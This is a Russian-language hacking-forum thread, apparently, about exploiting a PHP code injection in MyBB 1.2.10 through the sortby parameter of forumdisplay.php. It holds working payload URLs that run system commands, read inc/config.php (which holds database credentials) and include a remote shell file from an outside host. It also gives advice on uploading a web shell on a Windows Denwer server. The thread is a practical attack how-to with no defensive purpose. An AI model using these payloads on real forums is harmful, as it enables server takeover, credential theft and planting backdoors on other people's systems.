Здравствуйте.Есть уязвимость в mybb 1.210 такого вида

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//


Но когда я пытаюсь зайти в папку С:\\Program files\(Папки с пробелом) он почему то не заходит(пишет разные символы).В чем проблема?Как можно заменить пробел?Доступ к диску C:\ есть(Сайт стоит на denwer'e).

И ишо вопрос как можно залить шелл?

В чем проблема залить шелл?
Узнай полный путь до каталога который видно с веба (на который у тебя хватит прав) и залей. Попробуй так: C:\PROGRA~1\[директория сервера]

Либо залей в корень диска С: пхп файл и проинклюдь его самостоятельно

Путь я знаю.Какими командами залить шелл?

TreV@N тебе в другой раздел

Какой?И чем тебя этот не устраевает?

Какой?И чем тебя этот не устраевает?

http://forum.antichat.ru/forum16.html :o

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];include('http://site.com/shell.txt');exit;//
узнать диру:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];echo getcwd();exit;//

Спасибо.По первому вопросу подскажите.